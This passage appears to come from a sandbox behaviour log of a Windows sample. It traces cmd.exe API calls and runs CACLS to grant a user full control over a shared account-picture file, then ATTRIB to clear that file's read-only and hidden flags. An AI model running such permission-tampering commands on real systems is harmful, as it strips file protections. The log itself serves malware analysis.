returned -14 [0191.327] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0191.327] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0191.327] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0191.327] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0191.327] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0191.327] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0191.327] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0191.327] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0191.327] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0191.327] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0191.327] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0191.327] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0191.327] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0191.327] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0191.327] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0191.327] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0191.327] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0191.327] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0191.327] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0191.327] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0191.327] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0191.327] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0191.327] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0191.327] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0191.327] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0191.327] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0191.327] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0191.327] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0191.327] _wcsicmp (_String1="CACLS", 
_String2="KEYS") returned -8 [0191.327] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0191.327] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0191.327] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0191.327] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0191.327] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0191.327] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0191.327] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0191.327] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0191.327] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0191.327] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0191.327] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0191.327] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0191.327] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0191.327] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0191.327] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0191.327] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0191.327] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0191.328] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0191.328] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0191.328] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0191.328] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0191.328] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0191.328] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0191.328] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0191.328] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0191.328] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0191.328] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0191.328] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0191.328] _wcsicmp (_String1="CACLS", 
_String2="GOTO") returned -4 [0191.328] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0191.328] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0191.328] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0191.328] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0191.328] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0191.328] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0191.328] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0191.328] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0191.328] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0191.328] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0191.328] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0191.328] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0191.328] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0191.328] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0191.328] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0191.328] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0191.328] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0191.328] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0191.328] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0191.328] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0191.328] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0191.328] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0191.328] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0191.328] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0191.329] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0191.329] SetErrorMode (uMode=0x0) returned 0x0 [0191.329] SetErrorMode (uMode=0x1) returned 0x0 [0191.329] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x281e98, lpFilePart=0x1cef94 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cef94*="Desktop") returned 0x18 [0191.329] SetErrorMode (uMode=0x0) returned 0x1 [0191.329] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0191.329] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0191.334] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0191.334] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0xffffffff [0191.335] GetLastError () returned 0x2 [0191.335] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0xffffffff [0191.335] GetLastError () returned 0x2 [0191.335] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0x282180 [0191.335] FindClose (in: hFindFile=0x282180 | out: hFindFile=0x282180) returned 1 [0191.335] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0xffffffff [0191.335] GetLastError () returned 0x2 [0191.335] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0x282180 [0191.335] FindClose 
(in: hFindFile=0x282180 | out: hFindFile=0x282180) returned 1 [0191.335] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0191.336] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0191.336] GetConsoleTitleW (in: lpConsoleTitle=0x1cf208, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.338] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf090, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf158 | out: lpAttributeList=0x1cf090, lpSize=0x1cf158) returned 1 [0191.338] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf090, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf150, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf090, lpPreviousValue=0x0) returned 1 [0191.338] GetStartupInfoW (in: lpStartupInfo=0x1cf04c | out: lpStartupInfo=0x1cf04c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0191.338] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0191.339] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf0ec*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, 
lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf138 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1cf138*(hProcess=0x50, hThread=0x4c, dwProcessId=0x958, dwThreadId=0xa78)) returned 1 [0191.342] CloseHandle (hObject=0x4c) returned 1 [0191.342] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0191.342] GetEnvironmentStringsW () returned 0x280308* [0191.342] FreeEnvironmentStringsW (penv=0x280308) returned 1 [0191.342] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0191.448] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cf02c | out: lpExitCode=0x1cf02c*=0x0) returned 1 [0191.448] CloseHandle (hObject=0x50) returned 1 [0191.448] _vsnwprintf (in: _Buffer=0x1cf174, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf038 | out: _Buffer="00000000") returned 8 [0191.448] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0191.449] GetEnvironmentStringsW () returned 0x282410* [0191.449] FreeEnvironmentStringsW (penv=0x282410) returned 1 [0191.449] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0191.449] GetEnvironmentStringsW () returned 0x282410* [0191.449] FreeEnvironmentStringsW (penv=0x282410) returned 1 [0191.449] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf090 | out: lpAttributeList=0x1cf090) [0191.449] GetConsoleTitleW (in: lpConsoleTitle=0x1cf474, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.449] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0191.449] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0191.449] GetEnvironmentVariableW (in: lpName="PATHEXT", 
lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0191.449] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0xffffffff [0191.450] GetLastError () returned 0x2 [0191.450] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0xffffffff [0191.450] GetLastError () returned 0x2 [0191.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0x27e4d8 [0191.450] FindClose (in: hFindFile=0x27e4d8 | out: hFindFile=0x27e4d8) returned 1 [0191.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0xffffffff [0191.450] GetLastError () returned 0x2 [0191.450] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ced10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced10) returned 0x27e4d8 [0191.450] FindClose (in: hFindFile=0x27e4d8 | out: hFindFile=0x27e4d8) returned 1 [0191.451] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0191.451] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0191.451] GetConsoleTitleW (in: lpConsoleTitle=0x1cf208, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.451] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf090, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf158 | out: 
lpAttributeList=0x1cf090, lpSize=0x1cf158) returned 1 [0191.451] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf090, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf150, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf090, lpPreviousValue=0x0) returned 1 [0191.451] GetStartupInfoW (in: lpStartupInfo=0x1cf04c | out: lpStartupInfo=0x1cf04c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0191.451] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0191.451] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf0ec*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf138 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"", lpProcessInformation=0x1cf138*(hProcess=0x4c, hThread=0x50, dwProcessId=0x740, dwThreadId=0x134)) returned 1 [0191.452] CloseHandle (hObject=0x50) returned 1 [0191.452] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0191.453] GetEnvironmentStringsW 
() returned 0x282410* [0191.453] FreeEnvironmentStringsW (penv=0x282410) returned 1 [0191.453] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0191.526] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1cf02c | out: lpExitCode=0x1cf02c*=0x0) returned 1 [0191.526] CloseHandle (hObject=0x4c) returned 1 [0191.527] _vsnwprintf (in: _Buffer=0x1cf174, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf038 | out: _Buffer="00000000") returned 8 [0191.527] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0191.527] GetEnvironmentStringsW () returned 0x282410* [0191.527] FreeEnvironmentStringsW (penv=0x282410) returned 1 [0191.527] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0191.527] GetEnvironmentStringsW () returned 0x282410* [0191.527] FreeEnvironmentStringsW (penv=0x282410) returned 1 [0191.527] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf090 | out: lpAttributeList=0x1cf090) [0191.527] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.527] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0191.527] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.527] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0191.527] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.527] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0191.527] SetConsoleInputExeNameW () returned 0x1 [0191.527] GetConsoleOutputCP () returned 0x1b5 [0191.527] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0191.528] SetThreadUILanguage (LangId=0x0) returned 0x409 [0191.528] exit (_Code=0) Process: id = "427" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea167e0" os_pid = "0x958" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "426" os_parent_pid = "0x8f8" cmd_line = "CACLS 
\"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28060 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28061 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28062 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28063 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 28064 start_va = 0xb00000 end_va = 0xb08fff entry_point = 0xb00000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 28065 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28066 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28067 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007ffb0000" filename = "" Region: id = 28068 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28069 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28070 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28071 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28072 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28073 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 28074 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 28075 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28076 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28077 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28078 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" 
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28079 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28080 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28081 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 611 os_tid = 0xa78 Thread: id = 612 os_tid = 0x990 Process: id = "428" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167e0" os_pid = "0x740" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "426" os_parent_pid = "0x8f8" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28082 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28083 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28084 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28085 start_va = 0x60000 end_va = 0x66fff entry_point = 0x60000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28086 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 28087 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28088 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28089 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28090 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 28091 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28092 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28093 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28094 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28095 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private 
name = "private_0x0000000000290000" filename = "" Region: id = 28096 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 28097 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28098 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28099 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 28100 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28101 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28102 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = 